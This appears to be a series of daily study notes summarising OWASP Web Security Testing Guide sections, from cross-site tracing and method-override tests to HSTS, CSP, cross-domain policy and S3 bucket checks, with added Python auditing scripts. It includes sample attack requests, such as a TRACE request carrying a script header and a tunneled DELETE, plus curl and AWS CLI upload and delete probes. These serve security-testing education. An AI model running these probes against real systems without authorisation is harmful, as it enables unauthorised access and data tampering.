The TRACE method, intended for testing and debugging, instructs the web server to reflect the received message back to the client. This method, while apparently harmless, can be successfully leveraged in some scenarios to steal legitimate users’ credentials. This attack technique was discovered by Jeremiah Grossman in 2003, in an attempt to bypass the HttpOnly attribute that aims to protect cookies from being accessed by JavaScript. However, the TRACE method can be used to bypass this protection and access the cookie even when this attribute is set.
Test for cross-site tracing potential by issuing a request such as the following:
```
$ ncat www.victim.com 80
TRACE / HTTP/1.1
Host: www.victim.com
Random: Header

HTTP/1.1 200 OK
Random: Header
...
```
The web server returned a 200 and reflected the random header that was set in place. To further exploit this issue:
```
$ ncat www.victim.com 80
TRACE / HTTP/1.1
Host: www.victim.com
Attack: <script>prompt()</script>
```
The above example works if the response is being reflected in the HTML context.
Testing for HTTP Method Overriding
Some web frameworks provide a way to override the actual HTTP method in the request by emulating the missing HTTP verbs passing some custom header in the requests. The main purpose of this is to circumvent some middleware (e.g. proxy, firewall) limitation where methods allowed usually do not encompass verbs such as PUT or DELETE. The following alternative headers could be used to do such verb tunneling:
**X-HTTP-Method**
**X-HTTP-Method-Override**
**X-Method-Override**
In order to test this, in the scenarios where restricted verbs such as PUT or DELETE return a “405 Method not allowed”, replay the same request with the addition of the alternative headers for HTTP method overriding, and observe how the system responds. The application should respond with a different status code (e.g. 200) in cases where method overriding is supported.
The web server in the following example does not allow the DELETE method and blocks it:
```
$ ncat www.example.com 80
DELETE /resource.html HTTP/1.1
Host: www.example.com

HTTP/1.1 405 Method Not Allowed
Date: Sat, 04 Apr 2020 18:26:53 GMT
Server: Apache
Allow: GET,HEAD,POST,OPTIONS
Content-Length: 320
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
```
After adding the X-HTTP-Method header, the server responds to the request with a 200:
```
$ ncat www.example.com 80
DELETE /resource.html HTTP/1.1
Host: www.example.com
X-HTTP-Method: DELETE

HTTP/1.1 200 OK
Date: Sat, 04 Apr 2020 19:26:01 GMT
Server: Apache
```
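Why the override headers matter for access control, as an added example that is not taken from the OWASP guide or from any real framework: a filter that checks only the request line lets a tunneled DELETE through, while a filter that applies the same allow-list to the verb the backend will act on does not. The filter and backend functions are constructed stand-ins; only the three header names and the Allow list come from the text above.

```python
# Constructed model of an edge filter in front of an override-aware backend.
OVERRIDE_HEADERS = ("x-http-method", "x-http-method-override", "x-method-override")
EDGE_ALLOWED = {"GET", "HEAD", "POST", "OPTIONS"}  # the Allow header shown above


def effective_method(method, headers):
    """Return the verb an override-aware framework would dispatch on."""
    lowered = {name.lower(): value for name, value in headers.items()}
    for name in OVERRIDE_HEADERS:
        value = lowered.get(name, "").strip()
        if value:
            return value.upper()
    return method.upper()


def backend(method, headers):
    """Hypothetical application that honours the override headers."""
    verb = effective_method(method, headers)
    if verb == "DELETE":
        return 200, "resource deleted"
    if verb in EDGE_ALLOWED:
        return 200, "ok"
    return 405, "Method Not Allowed"


def edge_request_line_only(method, headers):
    """Weak filter: validates the request line, forwards headers untouched."""
    if method.upper() not in EDGE_ALLOWED:
        return 405, "Method Not Allowed"
    return backend(method, headers)


def edge_hardened(method, headers):
    """Validate the verb the backend will act on, then drop override headers."""
    if method.upper() not in EDGE_ALLOWED:
        return 405, "Method Not Allowed"
    if effective_method(method, headers) not in EDGE_ALLOWED:
        return 405, "Method Not Allowed"
    forwarded = {k: v for k, v in headers.items()
                 if k.lower() not in OVERRIDE_HEADERS}
    return backend(method, forwarded)


if __name__ == "__main__":
    tunneled = {"Host": "www.example.com", "X-HTTP-Method": "DELETE"}
    print("request-line filter:", edge_request_line_only("POST", tunneled))
    print("hardened filter:    ", edge_hardened("POST", tunneled))
```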
Tools
1. Netcat
2. cURL
3. BurpSuite/ZAP
Note - I am making notes from the official OWASP website; you can check it here:
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just sharing what I learn to help others!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 28 Task.md
================================================
🎯 Day 28 Task
✅ THM Room
https://tryhackme.com/room/walkinganapplication
✅ 4.2.7 Test HTTP Strict Transport Security (HSTS)
The HTTP Strict Transport Security (HSTS) feature lets a web application inform the browser through the use of a special response header that it should never establish a connection to the specified domain servers using un-encrypted HTTP. Instead, it should automatically establish all connection requests to access the site through HTTPS. It also prevents users from overriding certificate errors.
The HTTP Strict Transport Security header uses two directives, plus the unofficial preload directive:
1. **max-age**: the number of seconds for which the browser should automatically convert all HTTP requests to HTTPS.
2. **includeSubDomains**: indicates that all related sub-domains must use HTTPS.
3. **preload** (unofficial): indicates that the domain(s) are on the preload list(s) and that browsers should never connect without HTTPS.
Here’s an example of the HSTS header implementation:
```
Strict-Transport-Security: max-age=31536000; includeSubDomains
```
The use of this header by web applications must be checked to find if the following security issues could be produced:
1. Attackers sniffing the network traffic and accessing the information transferred through an un-encrypted channel.
2. Attackers exploiting a manipulator-in-the-middle attack because of the problem of accepting certificates that are not trusted.
3. Users who mistakenly entered an address in the browser putting HTTP instead of HTTPS, or users who click on a link in a web application which mistakenly indicated use of the HTTP protocol.
Test Objectives
Review the HSTS header and its validity.
How to Test
The presence of the HSTS header can be confirmed by examining the server’s response through an intercepting proxy or by using curl as follows:
```
curl -s -D- https://owasp.org | grep -i strict
Strict-Transport-Security: max-age=31536000
```
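Confirming that the header is present is only the first step; its validity also has to be reviewed. The added example below (not part of the OWASP guide) parses a Strict-Transport-Security value and reports weak settings. The finding labels and the one-year baseline, taken from the header example above, are this example's own choices, and the preload check reflects the preload list's submission requirements.

```python
ONE_YEAR = 31536000  # max-age used in the header example above


def parse_hsts(value):
    """Split a Strict-Transport-Security value into ({directive: argument}, duplicates).

    Directive names are case-insensitive. RFC 6797 requires each directive
    to appear only once, so repeats are collected and reported.
    """
    directives, duplicates = {}, []
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, argument = part.partition("=")
        name = name.strip().lower()
        if name in directives:
            duplicates.append(name)
            continue
        directives[name] = argument.strip().strip('"')
    return directives, duplicates


def audit_hsts(headers, scheme="https", min_age=ONE_YEAR):
    """Return a list of finding labels for one response's headers."""
    values = [v for k, v in headers.items()
              if k.lower() == "strict-transport-security"]
    if not values:
        return ["missing-header"]
    findings = []
    if scheme != "https":
        # Browsers ignore HSTS received over plain HTTP.
        findings.append("sent-over-http")
    directives, duplicates = parse_hsts(values[0])
    findings += ["duplicate-" + name for name in duplicates]

    age = None
    raw_age = directives.get("max-age")
    if raw_age is None:
        findings.append("no-max-age")
    elif not (raw_age.isascii() and raw_age.isdigit()):
        findings.append("invalid-max-age")
    else:
        age = int(raw_age)
        if age == 0:
            findings.append("max-age-zero")  # tells the browser to drop the policy
        elif age < min_age:
            findings.append("max-age-short")

    has_subdomains = "includesubdomains" in directives
    if not has_subdomains:
        findings.append("no-includesubdomains")
    if "preload" in directives and (age is None or age < ONE_YEAR or not has_subdomains):
        findings.append("preload-requirements-unmet")
    return findings


if __name__ == "__main__":
    # Header value returned by the curl command above.
    print(audit_hsts({"Strict-Transport-Security": "max-age=31536000"}))
```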
================================================
FILE: Resources/Day 29 Task.md
================================================
🎯 Day 29 Task
✅ THM Room
https://tryhackme.com/room/sqlinjectionlm
✅ 4.2.8 Test RIA Cross Domain Policy
Test Objectives - Review and validate the policy files.
What are cross-domain policy files?
A cross-domain policy file specifies the permissions that a web client such as Java, Adobe Flash, Adobe Reader, etc. uses to access data across different domains. For Silverlight, Microsoft adopted a subset of Adobe’s crossdomain.xml and additionally created its own cross-domain policy file: clientaccesspolicy.xml.
Whenever a web client detects that a resource has to be requested from another domain, it first looks for a policy file in the target domain to determine whether cross-domain requests, including headers and socket-based connections, are allowed.
**Crossdomain.xml** vs. **Clientaccesspolicy.xml**
Most RIA applications support crossdomain.xml. However, in the case of Silverlight, it will only work if the crossdomain.xml specifies that access is allowed from any domain. For more granular control with Silverlight, clientaccesspolicy.xml must be used.
Policy files grant several types of permissions:
1. Accepted policy files (Master policy files can disable or restrict specific policy files)
2. Sockets permissions
3. Header permissions
4. HTTP/HTTPS access permissions
5. Allowing access based on cryptographic credentials
An example of an overly permissive policy file:
```
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="false"/>
</cross-domain-policy>
```
How can cross-domain policy files be abused?
1. Overly permissive cross-domain policies.
2. Generating server responses that may be treated as cross-domain policy files.
3. Using file upload functionality to upload files that may be treated as cross-domain policy files.
Impact of Abusing Cross-Domain Access
1. Defeat CSRF protections.
2. Read data restricted or otherwise protected by cross-origin policies.
How to Test - Testing for RIA Policy Files Weakness
To test for RIA policy file weakness the tester should try to retrieve the policy files crossdomain.xml and clientaccesspolicy.xml from the application’s root, and from every folder found.
For example, if the application’s URL is http://www.owasp.org, the tester should try to download the files http://www.owasp.org/crossdomain.xml and http://www.owasp.org/clientaccesspolicy.xml.
After retrieving all the policy files, the permissions allowed should be checked under the least privilege principle. Requests should only come from the domains, ports, or protocols that are necessary. Overly permissive policies should be avoided. Policies with * in them should be closely examined.
Example
```
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
```
Result Expected
1. A list of policy files found.
2. A list of weak settings in the policies.
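One way to produce the list of weak settings from retrieved policy files, as an added example that is not part of the OWASP guide. It audits both crossdomain.xml and clientaccesspolicy.xml; the first sample is the overly permissive policy shown above, the Silverlight sample is constructed, and the finding labels are this example's own.

```python
import xml.etree.ElementTree as ET

# The overly permissive crossdomain.xml shown earlier on this page.
PERMISSIVE = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="false"/>
</cross-domain-policy>"""

# Constructed clientaccesspolicy.xml sample.
SILVERLIGHT = """<access-policy><cross-domain-access><policy>
<allow-from http-request-headers="*"><domain uri="*"/></allow-from>
<grant-to><resource path="/" include-subpaths="true"/></grant-to>
</policy></cross-domain-access></access-policy>"""


def _wildcard(value):
    """Classify a domain/header value: 'any' for *, 'partial' for *.x, else None."""
    value = (value or "").strip()
    if value == "*":
        return "any"
    return "partial" if "*" in value else None


def audit_policy(xml_text):
    """Return (element, issue) pairs for either policy file format.

    ElementTree does not fetch the external DTD named in the DOCTYPE. For
    files from untrusted hosts a hardened parser such as defusedxml is the
    safer choice.
    """
    root = ET.fromstring(xml_text.strip())
    findings = []
    if root.tag == "cross-domain-policy":
        for el in root.iter("site-control"):
            if el.get("permitted-cross-domain-policies", "").lower() == "all":
                # Any policy file on the host is honoured, including uploaded ones.
                findings.append(("site-control", "all-policy-files-accepted"))
        for tag in ("allow-access-from", "allow-http-request-headers-from"):
            for el in root.iter(tag):
                scope = _wildcard(el.get("domain"))
                if scope:
                    findings.append((tag, "domain-%s-wildcard" % scope))
                if _wildcard(el.get("headers")) == "any":
                    findings.append((tag, "headers-any"))
                if el.get("secure", "true").lower() == "false":
                    # Content served over HTTPS becomes readable from HTTP origins.
                    findings.append((tag, "secure-false"))
    elif root.tag == "access-policy":
        for allow in root.iter("allow-from"):
            if _wildcard(allow.get("http-request-headers")) == "any":
                findings.append(("allow-from", "headers-any"))
            for domain in allow.iter("domain"):
                scope = _wildcard(domain.get("uri"))
                if scope:
                    findings.append(("domain", "uri-%s-wildcard" % scope))
    else:
        raise ValueError("not a recognised policy file: <%s>" % root.tag)
    return findings


if __name__ == "__main__":
    for finding in audit_policy(PERMISSIVE) + audit_policy(SILVERLIGHT):
        print(finding)
```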
✅ Tools - Nikto, BurpSuite/ZAP
================================================
FILE: Resources/Day 30 Task.md
================================================
🎯 Day 30 Task
✅ THM Room
https://tryhackme.com/room/windowsfundamentals2x0x
✅ 4.2.9 Test File Permission
Test Objectives - Review and identify any rogue file permissions.
How to Test
In Linux, use the ls command to check the file permissions. Alternatively, namei can also be used to recursively list file permissions.
```
namei -l /PathToCheck/
```
The files and directories that require file permission testing include but are not limited to:
1. Web files/directory
2. Configuration files/directory
3. Sensitive files (encrypted data, password, key)/directory
4. Log files (security logs, operation logs, admin logs)/directory
5. Executables (scripts, EXE, JAR, class, PHP, ASP)/directory
6. Database files/directory
7. Temp files/directory
8. Upload files/directory
Remediation
Set the permissions of the files and directories properly so that unauthorized users cannot access critical resources unnecessarily.
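namei -l prints the mode of every component of a path, which matters because a restrictive mode on a file protects little when a parent directory is world-writable. The added example below (not from the OWASP guide) reproduces that component walk in Python and flags such cases; the sensitive flag and the finding labels are this example's own choices.

```python
import os
import stat


def path_components(path):
    """Return every component from / down to path, in the order namei lists them."""
    path = os.path.realpath(path)
    parts = []
    while True:
        parts.append(path)
        parent = os.path.dirname(path)
        if parent == path:
            break
        path = parent
    return list(reversed(parts))


def audit_path(path, sensitive=False):
    """Return (component, issue) pairs for the path and all of its parents.

    sensitive=True also reports a final file that is readable by everyone,
    which is appropriate for keys, passwords and configuration files.
    """
    findings = []
    for component in path_components(path):
        mode = os.lstat(component).st_mode
        perms = stat.S_IMODE(mode)
        if stat.S_ISDIR(mode):
            # Without the sticky bit, any local user can rename or replace
            # entries in a world-writable directory, whatever their own modes.
            if perms & stat.S_IWOTH and not perms & stat.S_ISVTX:
                findings.append((component, "world-writable-dir"))
        else:
            if perms & stat.S_IWOTH:
                findings.append((component, "world-writable-file"))
            if sensitive and perms & stat.S_IROTH:
                findings.append((component, "world-readable-sensitive-file"))
    return findings


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "/etc/passwd"
    for component in path_components(target):
        print("%04o %s" % (stat.S_IMODE(os.lstat(component).st_mode), component))
    for finding in audit_path(target):
        print("FINDING:", finding)
```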
Tools - https://linux.die.net/man/1/namei
================================================
FILE: Resources/Day 31 Task.md
================================================
🎯 Day 31 Task
✅ THM Room
https://tryhackme.com/room/burpsuitebasics
✅ 4.2.10 Test for Subdomain Takeover
✅ https://0xpatrik.com/subdomain-takeover-basics/
Test Objectives
1. Enumerate all possible domains (previous and current).
2. Identify forgotten or misconfigured domains.
How to Test
Black-Box Testing
The first step is to enumerate the victim DNS servers and resource records. There are multiple ways to accomplish this task, for example DNS enumeration using a dictionary of common subdomains, DNS brute force, or using web search engines and other OSINT data sources.
Using the dig command the tester looks for the following DNS server response messages that warrant further investigation:
**NXDOMAIN**
**SERVFAIL**
**REFUSED**
**no servers could be reached**
Testing DNS A, CNAME Record Subdomain Takeover
Perform a basic DNS enumeration on the victim’s domain (victim.com) using dnsrecon:
```
$ ./dnsrecon.py -d victim.com
[*] Performing General Enumeration of Domain: victim.com
...
[-] DNSSEC is not configured for victim.com
[*] A subdomain.victim.com 192.30.252.153
[*] CNAME subdomain1.victim.com fictioussubdomain.victim.com
...
```
Identify which DNS resource records are dead and point to inactive/not-used services. Using the dig command for the CNAME record:
```
$ dig CNAME fictioussubdomain.victim.com
; <<>> DiG 9.10.3-P4-Ubuntu <<>> ns victim.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 42950
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1
```
The following DNS responses warrant further investigation: NXDOMAIN.
To test the A record the tester performs a whois database lookup and identifies GitHub as the service provider:
```
$ whois 192.30.252.153 | grep "OrgName"
OrgName: GitHub, Inc.
```
The tester visits subdomain.victim.com or issues an HTTP GET request, which returns a “404 - File not found” response; this is a clear indication of the vulnerability.
Testing NS Record Subdomain Takeover
Identify all nameservers for the domain in scope:
```
$ dig ns victim.com +short
ns1.victim.com
nameserver.expireddomain.com
```
In this fictitious example the tester checks whether the domain expireddomain.com is active with a domain registrar search. If the domain is available for purchase, the subdomain is vulnerable.
The following DNS responses warrant further investigation: SERVFAIL or REFUSED.
Gray-Box Testing
The tester has the DNS zone file available which means DNS enumeration is not necessary. The testing methodology is the same.
Tools -
Subdomain Enum Tools - Amass, Subfinder, Assetfinder
dig
dnsrecon
================================================
FILE: Resources/Day 32 Task.md
================================================
🎯 Day 32 Task
✅ THM Room
https://tryhackme.com/room/burpsuiterepeater
-----------------------------------------------------------------------------------------------------------------------------------------------
eJPT Journey (with consistency)
🎯 eJPT Day 1
🔃 Introduction (1-3)
1. The Information Security Field - Study Guide
2. Cryptography & VPNs - Study Guide
3. Wireshark Introduction - Study Guide
Wireshark Additional Resources
Cheat Sheets : - https://www.comparitech.com/net-admin/wireshark-cheat-sheet/
Hindi - Youtube : - https://youtu.be/a-Fg7VVDf14
English - Youtube : - https://youtu.be/4_7A8Ikp5Cc
**Note: eJPT material is very good for cracking the eJPT exam, but I share some additional resources for learning!**
----------------------------------------------------------------------------------------------------------------------------------------------
✅ 4.2.11 Test Cloud Storage
Test Objectives - Assess that the access control configuration for the storage services is properly in place.
How to Test
First identify the URL to access the data in the storage service, and then consider the following tests:
**read the unauthorized data**
**upload a new arbitrary file**
You may use curl for the tests with the following commands and see if unauthorized actions can be performed successfully.
To test the ability to read an object:
```
curl -X GET https://<cloud-storage-service>/<object>
```
To test the ability to upload a file:
```
curl -X PUT -d 'test' 'https://<cloud-storage-service>/test.txt'
```
Testing for Amazon S3 Bucket Misconfiguration
The Amazon S3 bucket URLs follow one of two formats, either virtual host style or path-style.
**Virtual Hosted Style Access**
```
https://bucket-name.s3.Region.amazonaws.com/key-name
```
In the following example, my-bucket is the bucket name, us-west-2 is the region, and puppy.png is the key-name:
```
https://my-bucket.s3.us-west-2.amazonaws.com/puppy.png
```
**Path-Style Access**
```
https://s3.Region.amazonaws.com/bucket-name/key-name
```
As above, in the following example, my-bucket is the bucket name, us-west-2 is the region, and puppy.png is the key-name:
```
https://s3.us-west-2.amazonaws.com/my-bucket/puppy.png
```
For some regions, the legacy global endpoint that does not specify a region-specific endpoint can be used. Its format is also either virtual hosted style or path-style.
**Virtual Hosted Style Access**
```
https://bucket-name.s3.amazonaws.com
```
**Path-Style Access**
```
https://s3.amazonaws.com/bucket-name
```
**Identify Bucket URL**
For black-box testing, S3 URLs can be found in the HTTP messages. The following example shows a bucket URL sent in the img tag of an HTTP response.
```
...
<img src="https://my-bucket.s3.us-west-2.amazonaws.com/puppy.png">
...
```
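To inventory which buckets an application references, the four URL formats above can be parsed mechanically. The following is an added example, not part of the OWASP guide: it extracts the bucket, region and key from virtual-hosted and path-style URLs, including the legacy global endpoint, and pulls them out of an HTTP body. The HTML sample is constructed around the img tag shown above, and the function names are this example's own.

```python
import re
from typing import NamedTuple, Optional
from urllib.parse import unquote, urlsplit


class S3Ref(NamedTuple):
    bucket: str
    region: Optional[str]  # None for the legacy global endpoint
    key: str
    style: str             # "virtual-hosted" or "path"


_REGION = r"(?P<region>[a-z0-9-]+)"
# s3.Region.amazonaws.com or s3.amazonaws.com: the bucket is in the path.
_PATH_HOST = re.compile(rf"^s3(?:\.{_REGION})?\.amazonaws\.com$")
# bucket-name.s3.Region.amazonaws.com or bucket-name.s3.amazonaws.com.
_VHOST = re.compile(rf"^(?P<bucket>.+)\.s3(?:\.{_REGION})?\.amazonaws\.com$")
_URL = re.compile(r"""https?://[^\s"'<>]+""")


def parse_s3_url(url):
    """Return an S3Ref for an S3 object or bucket URL, or None if it is not one."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    path = unquote(parts.path.lstrip("/"))
    match = _PATH_HOST.match(host)
    if match:
        bucket, _, key = path.partition("/")
        if not bucket:
            return None  # endpoint URL without a bucket
        return S3Ref(bucket, match.group("region"), key, "path")
    match = _VHOST.match(host)
    if match:
        # Bucket names may contain dots, so everything before ".s3." is the bucket.
        return S3Ref(match.group("bucket"), match.group("region"), path, "virtual-hosted")
    return None


def find_buckets(http_body):
    """Return the distinct S3 references found in an HTTP response body."""
    refs = []
    for url in _URL.findall(http_body):
        ref = parse_s3_url(url)
        if ref and ref not in refs:
            refs.append(ref)
    return refs


def s3_uri(ref):
    """Render a reference in the s3:// form the AWS CLI expects."""
    return "s3://%s/%s" % (ref.bucket, ref.key) if ref.key else "s3://%s" % ref.bucket


# Constructed response body containing the img tag from the example above.
SAMPLE_BODY = """<html><body>
<a href="https://www.example.com/about">About</a>
<img src="https://my-bucket.s3.us-west-2.amazonaws.com/puppy.png">
<img src="https://s3.us-west-2.amazonaws.com/my-bucket/puppy.png">
</body></html>"""

if __name__ == "__main__":
    for ref in find_buckets(SAMPLE_BODY):
        print(ref, s3_uri(ref))
```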
**Testing with AWS-CLI**
In addition to testing with curl, you can also test with the AWS command-line tool. In this case the s3:// URI scheme is used.
**List**
The following command lists all the objects in the bucket when it is configured as public.
```
aws s3 ls s3://<bucket-name>
```
**Upload**
The following is the command to upload a file
```
aws s3 cp arbitrary-file s3://bucket-name/path-to-save
```
This example shows the result when the upload has been successful.
```
aws s3 cp test.txt s3://bucket-name/test.txt
upload: ./test.txt to s3://bucket-name/test.txt
```
This example shows the result when the upload has failed.
```
aws s3 cp test.txt s3://bucket-name/test.txt
upload failed: ./test2.txt to s3://bucket-name/test2.txt An error occurred (AccessDenied) when calling the PutObject operation: Access Denied
```
**Remove**
The following is the command to remove an object
```
aws s3 rm s3://bucket-name/object-to-remove
```
**Tools**
AWS CLI - https://aws.amazon.com/cli/
================================================
FILE: Resources/Day 33 Task.md
================================================
🎯 Day 33 Task
✅ THM Room
https://tryhackme.com/room/picklerick
-------------------------------------------------------------------------------------------------------------------------
✅ eJPT
✅ Introduction (4-7)
4. HTTP(s) Traffic Sniffing
5. Connecting to your first lab
6. HTTP(S) Traffic Sniffing
7. Binary Arithmetic Basics - Study Guide
Binary Arithmetic Calculator
https://www.rapidtables.com/convert/number/
**Note: eJPT material is very good for cracking the eJPT exam, but I share some additional resources for learning!**
-------------------------------------------------------------------------------------------------------------------------
✅ 4.2.12 Test for Content Security Policy
Test Objectives - Review the Content-Security-Policy header or meta element to identify misconfigurations.
How to Test
To test for misconfigurations in CSPs, look for insecure configurations by examining the Content-Security-Policy HTTP response header or CSP meta element in a proxy tool:
1. The unsafe-inline directive enables inline scripts or styles, making the application susceptible to XSS attacks.
2. The unsafe-eval directive allows eval() to be used in the application.
3. Resources such as scripts can be allowed to load from any origin by the use of a wildcard (*) source.
   a. Also consider wildcards based on partial matches, such as: https://* or *.cdn.com.
   b. Consider whether allow-listed sources provide JSONP endpoints which might be used to bypass CSP or the same-origin policy.
4. Framing can be enabled for all origins by the use of a wildcard (*) source for the frame-ancestors directive.
5. Business-critical applications should be required to use a strict policy.
**Remediation**
Configure a strong content security policy which reduces the attack surface of the application. Developers can verify the strength of content security policy using online tools such as Google CSP Evaluator.
**Strict Policy**
A strict policy is a policy which provides protection against classical stored, reflected, and some of the DOM XSS attacks and should be the optimal goal of any team trying to implement CSP.
Google went ahead and set up a guide to adopt a strict CSP based on nonces. Based on a presentation at LocoMocoSec, the following two policies can be used to apply a strict policy:
Moderate Strict Policy:
```
script-src 'nonce-r4nd0m' 'strict-dynamic';
object-src 'none'; base-uri 'none';
```
Locked down Strict Policy:
```
script-src 'nonce-r4nd0m';
object-src 'none'; base-uri 'none';
```
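The checks listed under How to Test can be run against a policy string directly. The following is an added example, not part of the OWASP guide or of Google's CSP Evaluator. It assumes CSP Level 3 behaviour: unsafe-inline is ignored when a nonce or hash is present, and host or scheme sources are ignored under strict-dynamic. The object-src and base-uri checks are derived from the two strict policies above, and the finding labels are this example's own.

```python
NONCE_OR_HASH = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")
SCHEME_ONLY = {"http:", "https:", "data:"}


def parse_csp(policy):
    """Return {directive: [sources]}; tokens are lowercased for matching only."""
    directives = {}
    for chunk in policy.split(";"):
        tokens = chunk.lower().split()
        # When a directive is repeated, browsers use the first occurrence.
        if tokens and tokens[0] not in directives:
            directives[tokens[0]] = tokens[1:]
    return directives


def _broad_sources(sources):
    issues = []
    for source in sources:
        if source == "*":
            issues.append("wildcard-any-origin")
        elif "*" in source:
            issues.append("partial-wildcard " + source)
        elif source in SCHEME_ONLY:
            issues.append("scheme-only " + source)
    return issues


def audit_csp(policy):
    """Return (directive, issue) pairs for one Content-Security-Policy value."""
    d = parse_csp(policy)
    findings = []
    for name in ("script-src", "style-src"):
        sources = d.get(name, d.get("default-src"))  # fall back to default-src
        if sources is None:
            if name == "script-src":
                findings.append((name, "unrestricted"))
            continue
        pinned = any(s.startswith(NONCE_OR_HASH) for s in sources)
        if "'unsafe-inline'" in sources and not pinned:
            findings.append((name, "unsafe-inline"))
        if "'unsafe-eval'" in sources:
            findings.append((name, "unsafe-eval"))
        if "'strict-dynamic'" not in sources:
            findings += [(name, issue) for issue in _broad_sources(sources)]
    # frame-ancestors and base-uri do not fall back to default-src.
    if "*" in d.get("frame-ancestors", []):
        findings.append(("frame-ancestors", "wildcard-any-origin"))
    if d.get("object-src", d.get("default-src")) != ["'none'"]:
        findings.append(("object-src", "not-none"))
    if "base-uri" not in d:
        findings.append(("base-uri", "missing"))
    return findings


# Constructed weak policy combining the misconfigurations listed above.
WEAK = ("default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' "
        "https://* *.cdn.com; frame-ancestors *")
# The moderate strict policy from this page.
STRICT = "script-src 'nonce-r4nd0m' 'strict-dynamic'; object-src 'none'; base-uri 'none';"

if __name__ == "__main__":
    for label, policy in (("weak", WEAK), ("strict", STRICT)):
        print(label, audit_csp(policy))
```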
================================================
FILE: Resources/Day 34 Task.md
================================================
🎯 Day 34 Task
🔃 THM Room - Linux PrivEsc
T 11 - Privilege Escalation: NFS
https://tryhackme.com/room/linprivesc
-------------------------------------------------------------------------------------------------------------------------
✅ eJPT
Networking (1-3)
1. Protocols - Study Guide
2. Internet Protocols (IP) - Study Guide
3. Routing - Study Guide
Ports Cheatsheet
http://packetlife.net/media/library/23/common-ports.pdf
**Note: eJPT material is very good for cracking the eJPT exam, but I share some additional resources for learning!**
-------------------------------------------------------------------------------------------------------------------------
🔃 4.3 Identity Management Testing
✅ 4.3.1 Test Role Definitions
Test Objectives
1. Identify and document roles used by the application.
2. Attempt to switch, change, or access another role.
3. Review the granularity of the roles and the needs behind the permissions given.
How to Test - Roles Identification
The tester should start by identifying the application roles being tested through any of the following methods:
1. Application documentation.
2. Guidance by the developers or administrators of the application.
3. Application comments.
4. Fuzz possible roles:
a. cookie variable (e.g. role=admin, isAdmin=True)
b. account variable (e.g. Role: manager)
c. hidden directories or files (e.g. /admin, /mod, /backups)
d. switching to well known users (e.g. admin, backups, etc.)
Switching to Available Roles
After identifying possible attack vectors, the tester needs to test and validate that they can access the available roles.
Some applications define the roles of the user on creation, through rigorous checks and policies, or by ensuring that the user’s role is properly protected through a signature created by the backend. Finding that roles exist doesn’t mean that they’re a vulnerability.
Review Roles Permissions
After gaining access to the roles on the system, the tester must understand the permissions provided to each role.
A support engineer shouldn’t be able to conduct administrative functionalities, manage the backups, or conduct any transactions in the place of a user.
An administrator shouldn’t have full powers on the system. Sensitive admin functionality should leverage a maker-checker principle, or use MFA to ensure that the administrator is conducting the transaction. A clear example of this was the Twitter incident in 2020.
Tools
The above mentioned tests can be conducted without the use of any tool, except the one being used to access the system.
To make things easier and more documented, one can use:
Burp's Autorize extension
ZAP
================================================
FILE: Resources/Day 35 Task.md
================================================
🎯 Day 35 Task
✅ eJPT
🔃 Networking (4)
Link Layer Devices & Protocols - Study Guide
-------------------------------------------------------------------------------------------------------------
✅ 4.3.2 Test User Registration Process
Test Objectives - Verify that the identity requirements for user registration are aligned with business and security requirements.
Validate the registration process.
How to Test - Verify that the identity requirements for user registration are aligned with business and security requirements:
1. Can anyone register for access?
2. Are registrations vetted by a human prior to provisioning, or are they automatically granted if the criteria are met?
3. Can the same person or identity register multiple times?
4. Can users register for different roles or permissions?
5. What proof of identity is required for a registration to be successful?
6. Are registered identities verified?
Validate the registration process:
1. Can identity information be easily forged or faked?
2. Can the exchange of identity information be manipulated during registration?
Example
In the WordPress example below, the only identification requirement is an email address that is accessible to the registrant.
In contrast, in the Google example below the identification requirements include name, date of birth, country, mobile phone number, email address and CAPTCHA response. While only two of these can be verified (email address and mobile number), the identification requirements are stricter than WordPress.
Remediation
Implement identification and verification requirements that correspond to the security requirements of the information the credentials protect.
Tools
BurpSuite/ZAP
================================================
FILE: Resources/Day 36 Task.md
================================================
🎯 Day 36 Task
✅ 4.3.3 Test Account Provisioning Process
Test Objectives - Verify which accounts may provision other accounts and of what type.
How to Test
Determine which roles are able to provision users and what sort of accounts they can provision.
1. Is there any verification, vetting and authorization of provisioning requests?
2. Is there any verification, vetting and authorization of de-provisioning requests?
3. Can an administrator provision other administrators or just users?
4. Can an administrator or other user provision accounts with privileges greater than their own?
5. Can an administrator or user de-provision themselves?
6. How are the files or resources owned by the de-provisioned user managed? Are they deleted? Is access transferred?
Example
In WordPress, only a user’s name and email address are required to provision the user, as shown below:
De-provisioning of users requires the administrator to select the users to be de-provisioned, select Delete from the dropdown menu (circled) and then apply this action. The administrator is then presented with a dialog box asking what to do with the user’s posts (delete or transfer them).
Tools
While the most thorough and accurate approach to completing this test is to conduct it manually, HTTP proxy tools could be also useful.
================================================
FILE: Resources/Day 37 Task.md
================================================
🎯 Day 37 Task
✅ 4.3.4 Testing for Account Enumeration and Guessable User Account
Test Objectives
1. Review processes that pertain to user identification (e.g. registration, login, etc.).
2. Enumerate users where possible through response analysis.
How to Test
In black-box testing, the tester knows nothing about the specific application, username, application logic, error messages on log in page, or password recovery facilities. If the application is vulnerable, the tester receives a response message that reveals, directly or indirectly, some information useful for enumerating users.
HTTP Response Message
Testing for Valid Credentials
Record the server answer when you submit a valid user ID and valid password.
